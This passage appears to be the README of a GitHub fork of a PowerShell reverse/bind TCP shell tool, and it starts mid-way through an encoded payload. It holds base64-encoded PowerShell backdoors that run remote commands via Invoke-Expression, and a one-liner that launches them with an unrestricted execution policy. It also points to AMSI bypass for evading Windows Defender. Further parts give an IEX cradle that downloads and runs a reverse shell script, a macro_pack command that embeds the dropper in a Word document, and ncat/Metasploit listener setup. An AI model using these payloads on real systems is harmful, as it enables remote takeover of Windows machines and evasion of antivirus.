AB1AHAAIABhAG4AZAAgAHIAdQBuAG4AaQBuAGcALgAuAC4AYABuAGAAbgBXAGEAaQB0AGkAbgBnACAAZgBvAHIAIABjAGwAaQBlAG4AdAAgAHQAbwAgAGMAbwBuAG4AZQBjAHQALgAuAC4AYABuACIAOwAgAGQAbwAgAHsAIABpAGYAIAAoACQAbAAuAFAAZQBuAGQAaQBuAGcAKAApACkAIAB7ACAAJABjACAAPQAgACQAbAAuAEEAYwBjAGUAcAB0AFQAYwBwAEMAbABpAGUAbgB0ACgAKQA7ACAAfQAgAGUAbABzAGUAIAB7ACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgADUAMAAwADsAIAB9ACAAfQAgAHcAaABpAGwAZQAgACgAJABjACAALQBlAHEAIAAkAG4AdQBsAGwAKQA7ACAAJABsAC4AUwB0AG8AcAAoACkAOwAgACQAdAAgAD0AIAAkAGMALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwAgACQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAxADAAMgA0ADsAIAAkAGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAHMAYwBpAGkARQBuAGMAbwBkAGkAbgBnADsAIAAkAHcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFcAcgBpAHQAZQByACgAJAB0ACkAOwAgACQAdwAuAEEAdQB0AG8ARgBsAHUAcwBoACAAPQAgACQAdAByAHUAZQA7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQwBsAGkAZQBuAHQAIABoAGEAcwAgAGMAbwBuAG4AZQBjAHQAZQBkACEAYABuACIAOwAgACQAYgB5ACAAPQAgADAAOwAgAGQAbwAgAHsAIAAkAHcALgBXAHIAaQB0AGUAKAAiAFAAUwA+ACIAKQA7ACAAZABvACAAewAgACQAYgB5ACAAPQAgACQAdAAuAFIAZQBhAGQAKAAkAGIALAAgADAALAAgACQAYgAuAEwAZQBuAGcAdABoACkAOwAgAGkAZgAgACgAJABiAHkAIAAtAGcAdAAgADAAKQAgAHsAIAAkAGQAIAA9ACAAJABkACAAKwAgACQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiACwAIAAwACwAIAAkAGIAeQApADsAIAB9ACAAfQAgAHcAaABpAGwAZQAgACgAJAB0AC4ARABhAHQAYQBBAHYAYQBpAGwAYQBiAGwAZQApADsAIABpAGYAIAAoACQAYgB5ACAALQBnAHQAIAAwACkAIAB7ACAAJABkACAAPQAgACQAZAAuAFQAcgBpAG0AKAApADsAIABpAGYAIAAoACQAZAAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACkAIAB7ACAAdAByAHkAIAB7ACAAJAByACAAPQAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AQwBvAG0AbQBhAG4AZAAgACQAZAAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwA7ACAAfQAgAGMAYQB0AGMAaAAgAHsAIAAkAHIAIAA9ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4AIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwA7ACAAfQAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAZAAiADsAIAAkAGwAZQAgAD0AIAAkAHIALgBMAGUAbgBnAHQAaAA7ACAAaQBmACAAKAAkAGwAZQAgAC0AZwB0ACAAMAApACAAewAgACQAYwBvACAAPQAgADAAOwAgAGQAbwAgAHsAIABpAGYAIAAoACQAbABlACAALQBnAGUAIAAkAGIALgBMAGUAbgBnAHQAaAApACAAewAgACQAYgB5ACAAPQAgACQAYgAuAEwAZQBuAGcAdABoADsAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAGIAeQAgAD0AIAAkAGwAZQA7ACAAfQAgACQAdwAuAFcAcgBpAHQAZQAoACQAcgAuAHMAdQBiAHMAdAByAGkAbgBnACgAJABjAG8ALAAgACQAYgB5ACkAKQA7ACAAJABjAG8AIAArAD0AIAAkAGIAeQA7ACAAJABsAGUAIAAtAD0AIAAkAGIAeQA7ACAAfQAgAHcAaABpAGwAZQAgACgAJABsAGUAIAAtAGcAdAAgADAAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgByACIAOwAgAH0AIAB9ACAAfQAgAH0AIAB3AGgAaQBsAGUAIAAoACQAYgB5ACAALQBnAHQAIAAwACkAOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEMAbABpAGUAbgB0ACAAaABhAHMAIABkAGkAcwBjAG8AbgBuAGUAYwB0AGUAZAAhACIAOwAgAH0AIABjAGEAdABjAGgAIAB7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ASQBuAG4AZQByAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQA7ACAAfQAgAGYAaQBuAGEAbABsAHkAIAB7ACAAaQBmACAAKAAkAGwAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAbAAuAFMAZQByAHYAZQByAC4AQwBsAG8AcwBlACgAKQA7ACAAJABsAC4AUwBlAHIAdgBlAHIALgBEAGkAcwBwAG8AcwBlACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBsACIAOwAgAH0AIABpAGYAIAAoACQAdwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJAB3AC4AQwBsAG8AcwBlACgAKQA7ACAAJAB3AC4ARABpAHMAcABvAHMAZQAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAdwAiADsAIAB9ACAAaQBmACAAKAAkAHQAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAdAAuAEMAbABvAHMAZQAoACkAOwAgACQAdAAuAEQAaQBzAHAAbwBzAGUAKAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAHQAIgA7ACAAfQAgAGkAZgAgACgAJABjACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGMALgBDAGwAbwBzAGUAKAApADsAIAAkAGMALgBEAGkAcwBwAG8AcwBlACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBjACIAOwAgAH0AIABpAGYAIAAoACQAYgAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABiAC4AQwBsAGUAYQByACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBiACIAOwAgAH0AIABpAGYAIAAoACQAcgAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgByACIAOwAgAH0AIABpAGYAIAAoACQAZAAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBkACIAOwAgAH0AIABbAFMAeQBzAHQAZQBtAC4ARwBDAF0AOgA6AEMAbwBsAGwAZQBjAHQAKAApADsAIAB9ACAAfQA=

Encoded script will prompt for input. See the slightly altered script here - used the minified script to reduce the command length.

[Bind TCP - Parameterized] To pass parameters to PowerShell encoded command, run the following command from either PowerShell or Command Prompt:

PowerShell -Command "'9000'" | PowerShell -ExecutionPolicy Unrestricted -NoProfile -EncodedCommand JABwACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAHAAbwByAHQAIABuAHUAbQBiAGUAcgAiACkALgBUAHIAaQBtACgAKQA7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIgA7ACAAaQBmACAAKAAkAHAALgBMAGUAbgBnAHQAaAAgAC0AbAB0ACAAMQApACAAewAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAFAAbwByAHQAIABuAHUAbQBiAGUAcgAgAGkAcwAgAHIAZQBxAHUAaQByAGUAZAAiADsAIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAYABuACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwBgAG4AIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIABCAGkAbgBkACAAVABDAFAAIAB2ADMALgA1ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjAGAAbgAjACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYgB5ACAASQB2AGEAbgAgAFMAaQBuAGMAZQBrACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAYABuACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwBgAG4AIwAgAEcAaQB0AEgAdQBiACAAcgBlAHAAbwBzAGkAdABvAHIAeQAgAGEAdAAgAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBpAHYAYQBuAC0AcwBpAG4AYwBlAGsALwBwAG8AdwBlAHIAcwBoAGUAbABsAC0AcgBlAHYAZQByAHMAZQAtAHQAYwBwAC4AIAAjAGAAbgAjACAARgBlAGUAbAAgAGYAcgBlAGUAIAB0AG8AIABkAG8AbgBhAHQAZQAgAGIAaQB0AGMAbwBpAG4AIABhAHQAIAAxAEIAcgBaAE0ANgBUADcARwA5AFIATgA4AHYAYgBhAGIAbgBmAFgAdQA0AE0ANgBMAHAAZwB6AHQAcQA2AFkAMQA0AC4AIAAgACMAYABuACMAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwBgAG4AIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACIAOwAgACQAbAAgAD0AIAAkAG4AdQBsAGwAOwAgACQAYwAgAD0AIAAkAG4AdQBsAGwAOwAgACQAdAAgAD0AIAAkAG4AdQBsAGwAOwAgACQAYgAgAD0AIAAkAG4AdQBsAGwAOwAgACQAdwAgAD0AIAAkAG4AdQBsAGwAOwAgACQAZAAgAD0AIAAkAG4AdQBsAGwAOwAgACQAcgAgAD0AIAAkAG4AdQBsAGwAOwAgAHQAcgB5ACAAewAgACQAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAATABpAHMAdABlAG4AZQByACgAIgAwAC4AMAAuADAALgAwACIALAAgACQAcAApADsAIAAkAGwALgBTAHQAYQByAHQAKAApADsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBCAGEAYwBrAGQAbwBvAHIAIABpAHMAIAB1AHAAIABhAG4AZAAgAHIAdQBuAG4AaQBuAGcALgAuAC4AYABuAGAAbgBXAGEAaQB0AGkAbgBnACAAZgBvAHIAIABjAGwAaQBlAG4AdAAgAHQAbwAgAGMAbwBuAG4AZQBjAHQALgAuAC4AYABuACIAOwAgAGQAbwAgAHsAIABpAGYAIAAoACQAbAAuAFAAZQBuAGQAaQBuAGcAKAApACkAIAB7ACAAJABjACAAPQAgACQAbAAuAEEAYwBjAGUAcAB0AFQAYwBwAEMAbABpAGUAbgB0ACgAKQA7ACAAfQAgAGUAbABzAGUAIAB7ACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgADUAMAAwADsAIAB9ACAAfQAgAHcAaABpAGwAZQAgACgAJABjACAALQBlAHEAIAAkAG4AdQBsAGwAKQA7ACAAJABsAC4AUwB0AG8AcAAoACkAOwAgACQAdAAgAD0AIAAkAGMALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwAgACQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAxADAAMgA0ADsAIAAkAGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAHMAYwBpAGkARQBuAGMAbwBkAGkAbgBnADsAIAAkAHcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFcAcgBpAHQAZQByACgAJAB0ACkAOwAgACQAdwAuAEEAdQB0AG8ARgBsAHUAcwBoACAAPQAgACQAdAByAHUAZQA7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQwBsAGkAZQBuAHQAIABoAGEAcwAgAGMAbwBuAG4AZQBjAHQAZQBkACEAYABuACIAOwAgACQAYgB5ACAAPQAgADAAOwAgAGQAbwAgAHsAIAAkAHcALgBXAHIAaQB0AGUAKAAiAFAAUwA+ACIAKQA7ACAAZABvACAAewAgACQAYgB5ACAAPQAgACQAdAAuAFIAZQBhAGQAKAAkAGIALAAgADAALAAgACQAYgAuAEwAZQBuAGcAdABoACkAOwAgAGkAZgAgACgAJABiAHkAIAAtAGcAdAAgADAAKQAgAHsAIAAkAGQAIAA9ACAAJABkACAAKwAgACQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiACwAIAAwACwAIAAkAGIAeQApADsAIAB9ACAAfQAgAHcAaABpAGwAZQAgACgAJAB0AC4ARABhAHQAYQBBAHYAYQBpAGwAYQBiAGwAZQApADsAIABpAGYAIAAoACQAYgB5ACAALQBnAHQAIAAwACkAIAB7ACAAJABkACAAPQAgACQAZAAuAFQAcgBpAG0AKAApADsAIABpAGYAIAAoACQAZAAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACkAIAB7ACAAdAByAHkAIAB7ACAAJAByACAAPQAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AQwBvAG0AbQBhAG4AZAAgACQAZAAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwA7ACAAfQAgAGMAYQB0AGMAaAAgAHsAIAAkAHIAIAA9ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4AIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwA7ACAAfQAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAZAAiADsAIAAkAGwAZQAgAD0AIAAkAHIALgBMAGUAbgBnAHQAaAA7ACAAaQBmACAAKAAkAGwAZQAgAC0AZwB0ACAAMAApACAAewAgACQAYwBvACAAPQAgADAAOwAgAGQAbwAgAHsAIABpAGYAIAAoACQAbABlACAALQBnAGUAIAAkAGIALgBMAGUAbgBnAHQAaAApACAAewAgACQAYgB5ACAAPQAgACQAYgAuAEwAZQBuAGcAdABoADsAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAGIAeQAgAD0AIAAkAGwAZQA7ACAAfQAgACQAdwAuAFcAcgBpAHQAZQAoACQAcgAuAHMAdQBiAHMAdAByAGkAbgBnACgAJABjAG8ALAAgACQAYgB5ACkAKQA7ACAAJABjAG8AIAArAD0AIAAkAGIAeQA7ACAAJABsAGUAIAAtAD0AIAAkAGIAeQA7ACAAfQAgAHcAaABpAGwAZQAgACgAJABsAGUAIAAtAGcAdAAgADAAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgByACIAOwAgAH0AIAB9ACAAfQAgAH0AIAB3AGgAaQBsAGUAIAAoACQAYgB5ACAALQBnAHQAIAAwACkAOwAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEMAbABpAGUAbgB0ACAAaABhAHMAIABkAGkAcwBjAG8AbgBuAGUAYwB0AGUAZAAhACIAOwAgAH0AIABjAGEAdABjAGgAIAB7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ASQBuAG4AZQByAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQA7ACAAfQAgAGYAaQBuAGEAbABsAHkAIAB7ACAAaQBmACAAKAAkAGwAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAbAAuAFMAZQByAHYAZQByAC4AQwBsAG8AcwBlACgAKQA7ACAAJABsAC4AUwBlAHIAdgBlAHIALgBEAGkAcwBwAG8AcwBlACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBsACIAOwAgAH0AIABpAGYAIAAoACQAdwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJAB3AC4AQwBsAG8AcwBlACgAKQA7ACAAJAB3AC4ARABpAHMAcABvAHMAZQAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAdwAiADsAIAB9ACAAaQBmACAAKAAkAHQAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAdAAuAEMAbABvAHMAZQAoACkAOwAgACQAdAAuAEQAaQBzAHAAbwBzAGUAKAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAHQAIgA7ACAAfQAgAGkAZgAgACgAJABjACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGMALgBDAGwAbwBzAGUAKAApADsAIAAkAGMALgBEAGkAcwBwAG8AcwBlACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBjACIAOwAgAH0AIABpAGYAIAAoACQAYgAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABiAC4AQwBsAGUAYQByACgAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBiACIAOwAgAH0AIABpAGYAIAAoACQAcgAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgByACIAOwAgAH0AIABpAGYAIAAoACQAZAAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBkACIAOwAgAH0AIABbAFMAeQBzAHQAZQBtAC4ARwBDAF0AOgA6AEMAbwBsAGwAZQBjAHQAKAApADsAIAB9ACAAfQA=

To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:

[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script)))

To decode a PowerShell encoded command, run the following PowerShell command:

[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($command))

AMSI Bypass

If Windows Defender is blocking your PowerShell script or encoded command execution, generate an AMSI bypass code from AMSI.fail and run it in your PowerShell session. Credits to the author!

Additionally, after running the AMSI bypass code, you can download the content of your PowerShell script from the web using this minimalistic code:

IEX([System.IO.StreamReader]::New([System.Net.WebRequest]::Create('https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/prompt/powershell_reverse_tcp_prompt_mini.ps1').GetResponse().GetResponseStream()).ReadToEnd());

Find out more about AMSI bypass at S3cur3Th1sSh1t/Amsi-Bypass-Powershell. Credits to the author!

MS Word

To embed a PowerShell script into an MS Word document, check the macro_pack tool. Credits to the author!

Run the following command:

echo "https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/powershell_reverse_tcp.ps1" | macro_pack.exe -t DROPPER_PS -o -G powpow.doc

Set Up a Listener

To set up a listener, open your preferred console on Kali Linux and run one of the examples below.

Set up an ncat listener:

ncat -nvlp 9000

Set up a multi/handler module:

msfconsole -q

use exploit/multi/handler

set PAYLOAD windows/shell_reverse_tcp

set LHOST 127.0.0.1

set LPORT 9000

exploit

Images

Figure 1 - Backdoor

Figure 2 - Listener

adityaviswabhusan14 / powershell-reverse-tcp